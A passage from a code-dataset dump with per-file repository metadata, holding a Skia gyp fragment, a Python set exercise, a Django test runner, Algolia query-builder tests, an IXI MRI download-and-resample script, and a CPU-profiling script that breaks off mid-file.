'../third_party/skia/src/opts/SkBlurImage_opts_neon.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_neon.cpp',
],
'conditions': [
['arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
['arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
],
},
],
}],
],
}
| true | true |
f71907adad9d2ae1000384e3083a6e18b87ab471 | 98 | py | Python | Solution/90.py | pallavimr12/Python_Levelwise_Exercises | 4090437b537260be2eca06c8d52d3a2bba1f5a5e | [
"BSD-3-Clause"
] | 2 | 2020-10-23T10:55:58.000Z | 2020-11-24T04:26:23.000Z | Solution/90.py | pallavimr12/Python_Levelwise_Exercises | 4090437b537260be2eca06c8d52d3a2bba1f5a5e | [
"BSD-3-Clause"
] | null | null | null | Solution/90.py | pallavimr12/Python_Levelwise_Exercises | 4090437b537260be2eca06c8d52d3a2bba1f5a5e | [
"BSD-3-Clause"
] | 2 | 2020-11-19T06:37:29.000Z | 2022-01-18T14:36:46.000Z | set1=set([1,3,6,78,35,55])
set2=set([12,24,35,24,88,120,155])
set1 &= set2
li=list(set1)
print(li) | 19.6 | 34 | 0.653061 | set1=set([1,3,6,78,35,55])
set2=set([12,24,35,24,88,120,155])
set1 &= set2
li=list(set1)
print(li) | true | true |
f71908625209dd39e30f636c7b0dfff45f945d88 | 2,104 | py | Python | runtests.py | timgates42/django-spillway | f5700e21e545106005a99ba0804f7d6c88038553 | [
"BSD-3-Clause"
] | 62 | 2015-01-20T22:21:09.000Z | 2019-11-25T12:57:53.000Z | runtests.py | timgates42/django-spillway | f5700e21e545106005a99ba0804f7d6c88038553 | [
"BSD-3-Clause"
] | 24 | 2015-01-07T00:03:10.000Z | 2021-06-10T17:34:35.000Z | runtests.py | timgates42/django-spillway | f5700e21e545106005a99ba0804f7d6c88038553 | [
"BSD-3-Clause"
] | 19 | 2015-01-12T18:08:29.000Z | 2020-08-10T17:16:31.000Z | #!/usr/bin/env python
import os
import sys
import shutil
import tempfile
import traceback
from django.conf import settings
import django
TMPDIR = tempfile.mkdtemp(prefix='spillway_')
DEFAULT_SETTINGS = {
'INSTALLED_APPS': (
'django.contrib.staticfiles',
'django.contrib.gis',
'rest_framework',
'spillway',
'tests',
),
'DATABASES': {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.spatialite',
'NAME': 'spillway.db',
'TEST': {'NAME': os.path.join(TMPDIR, 'test.db')}
}
},
'MEDIA_ROOT': TMPDIR,
'MIDDLEWARE': (
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
),
'ROOT_URLCONF': 'tests.urls',
'STATIC_URL': '/static/',
'SPATIALITE_LIBRARY_PATH': 'mod_spatialite.so',
'TEMPLATES': [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}],
'REST_FRAMEWORK': {
# Fix for Django 1.9:
# https://github.com/tomchristie/django-rest-framework/issues/3494
'UNAUTHENTICATED_USER': None
}
}
def teardown():
try:
shutil.rmtree(TMPDIR)
except OSError:
print('Failed to remove {}'.format(TMPDIR))
def runtests():
if not settings.configured:
settings.configure(**DEFAULT_SETTINGS)
django.setup()
from spillway.models import upload_to
os.mkdir(os.path.join(TMPDIR, upload_to.path))
parent = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, parent)
try:
from django.test.runner import DiscoverRunner
runner_class = DiscoverRunner
except ImportError:
from django.test.simple import DjangoTestSuiteRunner
runner_class = DjangoTestSuiteRunner
try:
status = runner_class(
verbosity=1, interactive=True, failfast=False).run_tests(['tests'])
except Exception:
traceback.print_exc()
status = 1
finally:
teardown()
sys.exit(status)
if __name__ == '__main__':
runtests()
| 26.632911 | 79 | 0.626901 |
import os
import sys
import shutil
import tempfile
import traceback
from django.conf import settings
import django
TMPDIR = tempfile.mkdtemp(prefix='spillway_')
DEFAULT_SETTINGS = {
'INSTALLED_APPS': (
'django.contrib.staticfiles',
'django.contrib.gis',
'rest_framework',
'spillway',
'tests',
),
'DATABASES': {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.spatialite',
'NAME': 'spillway.db',
'TEST': {'NAME': os.path.join(TMPDIR, 'test.db')}
}
},
'MEDIA_ROOT': TMPDIR,
'MIDDLEWARE': (
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
),
'ROOT_URLCONF': 'tests.urls',
'STATIC_URL': '/static/',
'SPATIALITE_LIBRARY_PATH': 'mod_spatialite.so',
'TEMPLATES': [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}],
'REST_FRAMEWORK': {
'UNAUTHENTICATED_USER': None
}
}
def teardown():
try:
shutil.rmtree(TMPDIR)
except OSError:
print('Failed to remove {}'.format(TMPDIR))
def runtests():
if not settings.configured:
settings.configure(**DEFAULT_SETTINGS)
django.setup()
from spillway.models import upload_to
os.mkdir(os.path.join(TMPDIR, upload_to.path))
parent = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, parent)
try:
from django.test.runner import DiscoverRunner
runner_class = DiscoverRunner
except ImportError:
from django.test.simple import DjangoTestSuiteRunner
runner_class = DjangoTestSuiteRunner
try:
status = runner_class(
verbosity=1, interactive=True, failfast=False).run_tests(['tests'])
except Exception:
traceback.print_exc()
status = 1
finally:
teardown()
sys.exit(status)
if __name__ == '__main__':
runtests()
| true | true |
f71908676eab5124d188403862efaa148addfb00 | 3,684 | py | Python | tests/test_filters.py | Ryanb58/algoliaqb | d92a29e46d3ab4fd84685835a2b858e3ba8aecbb | [
"MIT"
] | 4 | 2020-08-28T19:22:02.000Z | 2020-09-04T21:12:43.000Z | tests/test_filters.py | Ryanb58/algoliaqb | d92a29e46d3ab4fd84685835a2b858e3ba8aecbb | [
"MIT"
] | 3 | 2020-08-31T16:05:47.000Z | 2020-09-11T16:31:24.000Z | tests/test_filters.py | Ryanb58/algoliaqb | d92a29e46d3ab4fd84685835a2b858e3ba8aecbb | [
"MIT"
] | null | null | null | from algoliaqb import AlgoliaQueryBuilder
def test_normal_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"is_reported": "is_reported"
}
)
flask_request_args = {
"is_reported": True
}
filter_query = aqb.get_filter_query(flask_request_args)
assert filter_query == "is_reported:True"
def test_object_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"status_id": {
"status_id": "statuses.status_id",
"group_id": "statuses.group_id"
},
"is_reported": "is_reported"
}
)
flask_request_args = {
"is_reported": True,
"status_id": 21,
"group_id": 4
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "is_reported:True" in filter_query
assert "statuses.status_id:21" in filter_query
assert "statuses.group_id:4" in filter_query
assert filter_query == "(statuses.status_id:21 AND statuses.group_id:4) AND is_reported:True"
def test_date_filter():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"group_id":"group_id",
"created_on": {
"type": "date",
"created_on_start": "created_on",
"created_on_end": "created_on"
}
}
)
flask_request_args = {
"group_id": 4,
"created_on_start": "1538697600",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on > 1538697600" in filter_query
assert filter_query == "group_id:4 AND created_on > 1538697600"
flask_request_args = {
"group_id": 4,
"created_on_start": "1538697600",
"created_on_end": "1539697800",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on:1538697600 TO 1539697800" in filter_query
assert filter_query == "group_id:4 AND created_on:1538697600 TO 1539697800"
flask_request_args = {
"group_id": 4,
"created_on_end": "1539697800",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on < 1539697800" in filter_query
assert filter_query == "group_id:4 AND created_on < 1539697800"
def test_not_using_normal_string_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"group_id": "group_id",
"status_id": {
"group_id": "statuses.group_id",
"status_id": "statuses.status_id",
},
"is_reported": "is_reported",
"main_contact_account_id": "main_contact.account_id",
"created_on": {
"type": "date",
"created_on_start": "created_on",
"created_on_end": "created_on",
},
"updated_on": {
"type": "date",
"updated_on_start": "updated_on",
"updated_on_end": "updated_on",
},
"referral_source_id": {
"group_id": "referral_sources.group_id",
"referral_source_id": "referral_sources.id",
},
"tag_id": {
"group_id": "tags.group_id",
"tag_id": "tags.id",
}
}
)
flask_request_args = {
"page": 1,
"order_by": "status_custom-position",
"group_id": 4,
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "group_id:4" in filter_query
assert filter_query == "group_id:4"
| 26.695652 | 97 | 0.575461 | from algoliaqb import AlgoliaQueryBuilder
def test_normal_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"is_reported": "is_reported"
}
)
flask_request_args = {
"is_reported": True
}
filter_query = aqb.get_filter_query(flask_request_args)
assert filter_query == "is_reported:True"
def test_object_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"status_id": {
"status_id": "statuses.status_id",
"group_id": "statuses.group_id"
},
"is_reported": "is_reported"
}
)
flask_request_args = {
"is_reported": True,
"status_id": 21,
"group_id": 4
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "is_reported:True" in filter_query
assert "statuses.status_id:21" in filter_query
assert "statuses.group_id:4" in filter_query
assert filter_query == "(statuses.status_id:21 AND statuses.group_id:4) AND is_reported:True"
def test_date_filter():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"group_id":"group_id",
"created_on": {
"type": "date",
"created_on_start": "created_on",
"created_on_end": "created_on"
}
}
)
flask_request_args = {
"group_id": 4,
"created_on_start": "1538697600",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on > 1538697600" in filter_query
assert filter_query == "group_id:4 AND created_on > 1538697600"
flask_request_args = {
"group_id": 4,
"created_on_start": "1538697600",
"created_on_end": "1539697800",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on:1538697600 TO 1539697800" in filter_query
assert filter_query == "group_id:4 AND created_on:1538697600 TO 1539697800"
flask_request_args = {
"group_id": 4,
"created_on_end": "1539697800",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on < 1539697800" in filter_query
assert filter_query == "group_id:4 AND created_on < 1539697800"
def test_not_using_normal_string_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"group_id": "group_id",
"status_id": {
"group_id": "statuses.group_id",
"status_id": "statuses.status_id",
},
"is_reported": "is_reported",
"main_contact_account_id": "main_contact.account_id",
"created_on": {
"type": "date",
"created_on_start": "created_on",
"created_on_end": "created_on",
},
"updated_on": {
"type": "date",
"updated_on_start": "updated_on",
"updated_on_end": "updated_on",
},
"referral_source_id": {
"group_id": "referral_sources.group_id",
"referral_source_id": "referral_sources.id",
},
"tag_id": {
"group_id": "tags.group_id",
"tag_id": "tags.id",
}
}
)
flask_request_args = {
"page": 1,
"order_by": "status_custom-position",
"group_id": 4,
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "group_id:4" in filter_query
assert filter_query == "group_id:4"
| true | true |
f7190a9265422f741faef15c4be15a7052a9510b | 7,314 | py | Python | data/IXI_HH/download_IXI_HH.py | sambuddinc/DLTK | 9511b0b9860118a9285c2fe730ea49dfe247cab6 | [
"Apache-2.0"
] | null | null | null | data/IXI_HH/download_IXI_HH.py | sambuddinc/DLTK | 9511b0b9860118a9285c2fe730ea49dfe247cab6 | [
"Apache-2.0"
] | null | null | null | data/IXI_HH/download_IXI_HH.py | sambuddinc/DLTK | 9511b0b9860118a9285c2fe730ea49dfe247cab6 | [
"Apache-2.0"
] | 1 | 2021-04-29T03:01:53.000Z | 2021-04-29T03:01:53.000Z | # -*- coding: utf-8 -*-
"""Download and extract the IXI Hammersmith Hospital 3T dataset
url: http://brain-development.org/ixi-dataset/
ref: IXI – Information eXtraction from Images (EPSRC GR/S21533/02)
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future.standard_library import install_aliases # py 2/3 compatability
install_aliases()
from urllib.request import FancyURLopener
import os.path
import tarfile
import pandas as pd
import glob
import SimpleITK as sitk
import numpy as np
DOWNLOAD_IMAGES = True
EXTRACT_IMAGES = True
PROCESS_OTHER = True
RESAMPLE_IMAGES = True
CLEAN_UP = True
def resample_image(itk_image, out_spacing=(1.0, 1.0, 1.0), is_label=False):
original_spacing = itk_image.GetSpacing()
original_size = itk_image.GetSize()
out_size = [int(np.round(original_size[0]*(original_spacing[0]/out_spacing[0]))),
int(np.round(original_size[1]*(original_spacing[1]/out_spacing[1]))),
int(np.round(original_size[2]*(original_spacing[2]/out_spacing[2])))]
resample = sitk.ResampleImageFilter()
resample.SetOutputSpacing(out_spacing)
resample.SetSize(out_size)
resample.SetOutputDirection(itk_image.GetDirection())
resample.SetOutputOrigin(itk_image.GetOrigin())
resample.SetTransform(sitk.Transform())
resample.SetDefaultPixelValue(itk_image.GetPixelIDValue())
if is_label:
resample.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resample.SetInterpolator(sitk.sitkBSpline)
return resample.Execute(itk_image)
def reslice_image(itk_image, itk_ref, is_label=False):
resample = sitk.ResampleImageFilter()
resample.SetReferenceImage(itk_ref)
if is_label:
resample.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resample.SetInterpolator(sitk.sitkBSpline)
return resample.Execute(itk_image)
urls = {}
urls['t1'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T1.tar'
urls['t2'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T2.tar'
urls['pd'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-PD.tar'
urls['mra'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-MRA.tar'
urls['demographic'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI.xls'
fnames = {}
fnames['t1'] = 't1.tar'
fnames['t2'] = 't2.tar'
fnames['pd'] = 'pd.tar'
fnames['mra'] = 'mra.tar'
fnames['demographic'] = 'demographic.xls'
if DOWNLOAD_IMAGES:
# Download all IXI data
for key, url in urls.items():
if not os.path.isfile(fnames[key]):
print('Downloading {} from {}'.format(fnames[key], url))
curr_file = FancyURLopener()
curr_file.retrieve(url, fnames[key])
else:
print('File {} already exists. Skipping download.'.format(
fnames[key]))
if EXTRACT_IMAGES:
# Extract the HH subset of IXI
for key, fname in fnames.items():
if (fname.endswith('.tar')):
print('Extracting IXI HH data from {}.'.format(fnames[key]))
output_dir = os.path.join('./orig/', key)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
t = tarfile.open(fname, 'r')
for member in t.getmembers():
if '-HH-' in member.name:
t.extract(member, output_dir)
if PROCESS_OTHER:
# Process the demographic xls data and save to csv
xls = pd.ExcelFile('demographic.xls')
print(xls.sheet_names)
df = xls.parse('Table')
for index, row in df.iterrows():
IXI_id = 'IXI{:03d}'.format(row['IXI_ID'])
df.loc[index, 'IXI_ID'] = IXI_id
t1_exists = len(glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id)))
t2_exists = len(glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id)))
pd_exists = len(glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id)))
mra_exists = len(glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id)))
# Check if each entry is complete and drop if not
# if not t1_exists and not t2_exists and not pd_exists and not mra
# exists:
if not (t1_exists and t2_exists and pd_exists and mra_exists):
df.drop(index, inplace=True)
# Write to csv file
df.to_csv('demographic_HH.csv', index=False)
if RESAMPLE_IMAGES:
# Resample the IXI HH T2 images to 1mm isotropic and reslice all
# others to it
df = pd.read_csv('demographic_HH.csv', dtype=object, keep_default_na=False,
na_values=[]).as_matrix()
for i in df:
IXI_id = i[0]
print('Resampling {}'.format(IXI_id))
t1_fn = glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id))[0]
t2_fn = glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id))[0]
pd_fn = glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id))[0]
mra_fn = glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id))[0]
t1 = sitk.ReadImage(t1_fn)
t2 = sitk.ReadImage(t2_fn)
pd = sitk.ReadImage(pd_fn)
mra = sitk.ReadImage(mra_fn)
# Resample to 1mm isotropic resolution
t2_1mm = resample_image(t2)
t1_1mm = reslice_image(t1, t2_1mm)
pd_1mm = reslice_image(pd, t2_1mm)
mra_1mm = reslice_image(mra, t2_1mm)
output_dir = os.path.join('./1mm/', IXI_id)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('T1: {} {}'.format(t1_1mm.GetSize(), t1_1mm.GetSpacing()))
print('T2: {} {}'.format(t2_1mm.GetSize(), t2_1mm.GetSpacing()))
print('PD: {} {}'.format(pd_1mm.GetSize(), pd_1mm.GetSpacing()))
print('MRA: {} {}'.format(mra_1mm.GetSize(), mra_1mm.GetSpacing()))
sitk.WriteImage(t1_1mm, os.path.join(output_dir, 'T1_1mm.nii.gz'))
sitk.WriteImage(t2_1mm, os.path.join(output_dir, 'T2_1mm.nii.gz'))
sitk.WriteImage(pd_1mm, os.path.join(output_dir, 'PD_1mm.nii.gz'))
sitk.WriteImage(mra_1mm, os.path.join(output_dir, 'MRA_1mm.nii.gz'))
# Resample to 2mm isotropic resolution
t2_2mm = resample_image(t2, out_spacing=[2.0, 2.0, 2.0])
t1_2mm = reslice_image(t1, t2_2mm)
pd_2mm = reslice_image(pd, t2_2mm)
mra_2mm = reslice_image(mra, t2_2mm)
output_dir = os.path.join('./2mm/', IXI_id)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('T1: {} {}'.format(t2_2mm.GetSize(), t1_2mm.GetSpacing()))
print('T2: {} {}'.format(t2_2mm.GetSize(), t2_2mm.GetSpacing()))
print('PD: {} {}'.format(pd_2mm.GetSize(), pd_2mm.GetSpacing()))
print('MRA: {} {}'.format(mra_2mm.GetSize(), mra_2mm.GetSpacing()))
sitk.WriteImage(t1_2mm, os.path.join(output_dir, 'T1_2mm.nii.gz'))
sitk.WriteImage(t2_2mm, os.path.join(output_dir, 'T2_2mm.nii.gz'))
sitk.WriteImage(pd_2mm, os.path.join(output_dir, 'PD_2mm.nii.gz'))
sitk.WriteImage(mra_2mm, os.path.join(output_dir, 'MRA_2mm.nii.gz'))
if CLEAN_UP:
# Remove the .tar files
for key, fname in fnames.items():
if (fname.endswith('.tar')):
os.remove(fname)
# Remove all data in original resolution
os.system('rm -rf orig')
| 35.852941 | 92 | 0.649439 |
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future.standard_library import install_aliases
install_aliases()
from urllib.request import FancyURLopener
import os.path
import tarfile
import pandas as pd
import glob
import SimpleITK as sitk
import numpy as np
DOWNLOAD_IMAGES = True
EXTRACT_IMAGES = True
PROCESS_OTHER = True
RESAMPLE_IMAGES = True
CLEAN_UP = True
def resample_image(itk_image, out_spacing=(1.0, 1.0, 1.0), is_label=False):
original_spacing = itk_image.GetSpacing()
original_size = itk_image.GetSize()
out_size = [int(np.round(original_size[0]*(original_spacing[0]/out_spacing[0]))),
int(np.round(original_size[1]*(original_spacing[1]/out_spacing[1]))),
int(np.round(original_size[2]*(original_spacing[2]/out_spacing[2])))]
resample = sitk.ResampleImageFilter()
resample.SetOutputSpacing(out_spacing)
resample.SetSize(out_size)
resample.SetOutputDirection(itk_image.GetDirection())
resample.SetOutputOrigin(itk_image.GetOrigin())
resample.SetTransform(sitk.Transform())
resample.SetDefaultPixelValue(itk_image.GetPixelIDValue())
if is_label:
resample.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resample.SetInterpolator(sitk.sitkBSpline)
return resample.Execute(itk_image)
def reslice_image(itk_image, itk_ref, is_label=False):
resample = sitk.ResampleImageFilter()
resample.SetReferenceImage(itk_ref)
if is_label:
resample.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resample.SetInterpolator(sitk.sitkBSpline)
return resample.Execute(itk_image)
urls = {}
urls['t1'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T1.tar'
urls['t2'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T2.tar'
urls['pd'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-PD.tar'
urls['mra'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-MRA.tar'
urls['demographic'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI.xls'
fnames = {}
fnames['t1'] = 't1.tar'
fnames['t2'] = 't2.tar'
fnames['pd'] = 'pd.tar'
fnames['mra'] = 'mra.tar'
fnames['demographic'] = 'demographic.xls'
if DOWNLOAD_IMAGES:
for key, url in urls.items():
if not os.path.isfile(fnames[key]):
print('Downloading {} from {}'.format(fnames[key], url))
curr_file = FancyURLopener()
curr_file.retrieve(url, fnames[key])
else:
print('File {} already exists. Skipping download.'.format(
fnames[key]))
if EXTRACT_IMAGES:
for key, fname in fnames.items():
if (fname.endswith('.tar')):
print('Extracting IXI HH data from {}.'.format(fnames[key]))
output_dir = os.path.join('./orig/', key)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
t = tarfile.open(fname, 'r')
for member in t.getmembers():
if '-HH-' in member.name:
t.extract(member, output_dir)
if PROCESS_OTHER:
xls = pd.ExcelFile('demographic.xls')
print(xls.sheet_names)
df = xls.parse('Table')
for index, row in df.iterrows():
IXI_id = 'IXI{:03d}'.format(row['IXI_ID'])
df.loc[index, 'IXI_ID'] = IXI_id
t1_exists = len(glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id)))
t2_exists = len(glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id)))
pd_exists = len(glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id)))
mra_exists = len(glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id)))
if not (t1_exists and t2_exists and pd_exists and mra_exists):
df.drop(index, inplace=True)
df.to_csv('demographic_HH.csv', index=False)
if RESAMPLE_IMAGES:
df = pd.read_csv('demographic_HH.csv', dtype=object, keep_default_na=False,
na_values=[]).as_matrix()
for i in df:
IXI_id = i[0]
print('Resampling {}'.format(IXI_id))
t1_fn = glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id))[0]
t2_fn = glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id))[0]
pd_fn = glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id))[0]
mra_fn = glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id))[0]
t1 = sitk.ReadImage(t1_fn)
t2 = sitk.ReadImage(t2_fn)
pd = sitk.ReadImage(pd_fn)
mra = sitk.ReadImage(mra_fn)
t2_1mm = resample_image(t2)
t1_1mm = reslice_image(t1, t2_1mm)
pd_1mm = reslice_image(pd, t2_1mm)
mra_1mm = reslice_image(mra, t2_1mm)
output_dir = os.path.join('./1mm/', IXI_id)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('T1: {} {}'.format(t1_1mm.GetSize(), t1_1mm.GetSpacing()))
print('T2: {} {}'.format(t2_1mm.GetSize(), t2_1mm.GetSpacing()))
print('PD: {} {}'.format(pd_1mm.GetSize(), pd_1mm.GetSpacing()))
print('MRA: {} {}'.format(mra_1mm.GetSize(), mra_1mm.GetSpacing()))
sitk.WriteImage(t1_1mm, os.path.join(output_dir, 'T1_1mm.nii.gz'))
sitk.WriteImage(t2_1mm, os.path.join(output_dir, 'T2_1mm.nii.gz'))
sitk.WriteImage(pd_1mm, os.path.join(output_dir, 'PD_1mm.nii.gz'))
sitk.WriteImage(mra_1mm, os.path.join(output_dir, 'MRA_1mm.nii.gz'))
t2_2mm = resample_image(t2, out_spacing=[2.0, 2.0, 2.0])
t1_2mm = reslice_image(t1, t2_2mm)
pd_2mm = reslice_image(pd, t2_2mm)
mra_2mm = reslice_image(mra, t2_2mm)
output_dir = os.path.join('./2mm/', IXI_id)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
print('T1: {} {}'.format(t2_2mm.GetSize(), t1_2mm.GetSpacing()))
print('T2: {} {}'.format(t2_2mm.GetSize(), t2_2mm.GetSpacing()))
print('PD: {} {}'.format(pd_2mm.GetSize(), pd_2mm.GetSpacing()))
print('MRA: {} {}'.format(mra_2mm.GetSize(), mra_2mm.GetSpacing()))
sitk.WriteImage(t1_2mm, os.path.join(output_dir, 'T1_2mm.nii.gz'))
sitk.WriteImage(t2_2mm, os.path.join(output_dir, 'T2_2mm.nii.gz'))
sitk.WriteImage(pd_2mm, os.path.join(output_dir, 'PD_2mm.nii.gz'))
sitk.WriteImage(mra_2mm, os.path.join(output_dir, 'MRA_2mm.nii.gz'))
if CLEAN_UP:
for key, fname in fnames.items():
if (fname.endswith('.tar')):
os.remove(fname)
os.system('rm -rf orig')
| true | true |
f7190ba74292947809c2128ff0aaecac93157a21 | 815 | py | Python | src/configs/model_id_opts.py | rgalhama/public_ICCM2021 | 6a528a26c649da0843b7acbc785aa99b80d29a74 | [
"MIT"
] | null | null | null | src/configs/model_id_opts.py | rgalhama/public_ICCM2021 | 6a528a26c649da0843b7acbc785aa99b80d29a74 | [
"MIT"
] | null | null | null | src/configs/model_id_opts.py | rgalhama/public_ICCM2021 | 6a528a26c649da0843b7acbc785aa99b80d29a74 | [
"MIT"
] | null | null | null | """
Author : Raquel G. Alhama
Desc:
"""
def strid_to_opts(strid):
"""
Given model id as string, extract parameter dictionary.
Reverse of config_loader.opts2strid
:param strid:
:return:
"""
raise NotImplementedError
#Method not finished
parts = strid.split("_")
param_keys=",".split("thr,win,dim,neg,dim,size,eig,neg,dyn,cds") #finish
d={}
for i,part in enumerate(parts):
if part == 'post':
pass
elif part in param_keys:
if i<len(parts) and not parts[i+1] not in param_keys:
k=part
v=parts[i+1]
d[k]=v
else: #key without value
k=part
v=1
d[k]=v
else: #value
pass
return d
# for p in parts: | 22.638889 | 76 | 0.516564 | def strid_to_opts(strid):
raise NotImplementedError
parts = strid.split("_")
param_keys=",".split("thr,win,dim,neg,dim,size,eig,neg,dyn,cds")
d={}
for i,part in enumerate(parts):
if part == 'post':
pass
elif part in param_keys:
if i<len(parts) and not parts[i+1] not in param_keys:
k=part
v=parts[i+1]
d[k]=v
else:
k=part
v=1
d[k]=v
else:
pass
return d
| true | true |
f7190ed8730fa9282a09a7f7c60f4b60d4d29e2d | 3,453 | py | Python | hotelReservation/scripts/cpu_breakdown.py | Romero027/DeathStarBench | 185b61851b7a89277c0c2c1845e18776a9dd7201 | [
"Apache-2.0"
] | null | null | null | hotelReservation/scripts/cpu_breakdown.py | Romero027/DeathStarBench | 185b61851b7a89277c0c2c1845e18776a9dd7201 | [
"Apache-2.0"
] | null | null | null | hotelReservation/scripts/cpu_breakdown.py | Romero027/DeathStarBench | 185b61851b7a89277c0c2c1845e18776a9dd7201 | [
"Apache-2.0"
] | null | null | null | import re
import subprocess
import argparse
import statistics
from pathlib import Path
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--proxy', type=str, default='tcp', help='proxy type (none, tcp, http or grpc)')
parser.add_argument('--app', type=str, help='the name of the application', required=True)
parser.add_argument("-v", "--verbose", action="store_true", help="print the command executed (for debugging purposes)")
return parser.parse_args()
def get_virtual_cores():
print("Running mpstat...")
cpu_util = []
for i in range(3):
cmd = ['mpstat', '1', '15']
# print("Running cmd: " + " ".join(cmd))
output = {}
result = subprocess.run(cmd, stdout=subprocess.PIPE)
result_average = result.stdout.decode("utf-8").split('\n')[-2].split()
overall = 100.00 - float(result_average[-1])
cpu_util.append(overall)
virtual_cores = statistics.mean(cpu_util)*0.64
print("Virutal Cores Usage: " + str(virtual_cores))
return virtual_cores
def get_cpu_percentage(target):
with open("./result/profile.svg", 'r') as fp:
lines = fp.readlines()
sum = 0.0
for line in lines:
if target in line:
# print(line)
l = re.findall(r"\d+\.\d+", line)
# print(l)
sum += float(l[0])
return sum
def generate_flamegraph():
print("Generating Flamegraph...")
cmd1 = ['python3', './profile.py', '-F 99', '-f', '30']
print("Running cmd: " + " ".join(cmd1))
with open("./result/out.profile-folded", "wb") as outfile1:
result = subprocess.run(cmd1, stdout=outfile1)
cmd2 = ['./flamegraph.pl', './result/out.profile-folded']
print("Running cmd: " + " ".join(cmd2))
with open("./result/profile_nosm.svg", "wb") as outfile2:
result = subprocess.run(cmd2, stdout=outfile2)
def get_cpu_breakdown(virtual_cores, proxy, app):
print("Caculating CPU breakdown...")
breakdown = {}
if proxy != "none":
breakdown['read'] = virtual_cores*get_cpu_percentage(">readv (")*0.01
breakdown['loopback'] = virtual_cores*get_cpu_percentage(">process_backlog (")*0.01
breakdown['write'] = virtual_cores*get_cpu_percentage(">writev (")*0.01 - breakdown['loopback']
breakdown['epoll'] = virtual_cores*get_cpu_percentage(">epoll_wait (")*0.01
breakdown['envoy'] = virtual_cores*get_cpu_percentage(">wrk:worker_0 (")*0.01+virtual_cores*get_cpu_percentage(">wrk:worker_1 (")*0.01
breakdown['envoy'] = breakdown['envoy']-(breakdown['read']+breakdown['write']+breakdown['loopback']+breakdown['epoll'])
breakdown['app'] = virtual_cores*get_cpu_percentage(">"+app+" (")*0.01
if proxy == 'http' or proxy =='grpc':
breakdown['http'] = virtual_cores*get_cpu_percentage(">Envoy::Network::FilterManagerImpl::onContinueReading(")*0.01
if proxy != "none":
breakdown['others'] = virtual_cores-(breakdown['read']+breakdown['write']+breakdown['loopback']+breakdown['epoll']+breakdown['envoy']+breakdown['app'])
else:
breakdown['others'] = virtual_cores-breakdown['app']
return breakdown
if __name__ == '__main__':
args = parse_args()
Path("./result").mkdir(parents=True, exist_ok=True)
virtual_cores = get_virtual_cores()
generate_flamegraph()
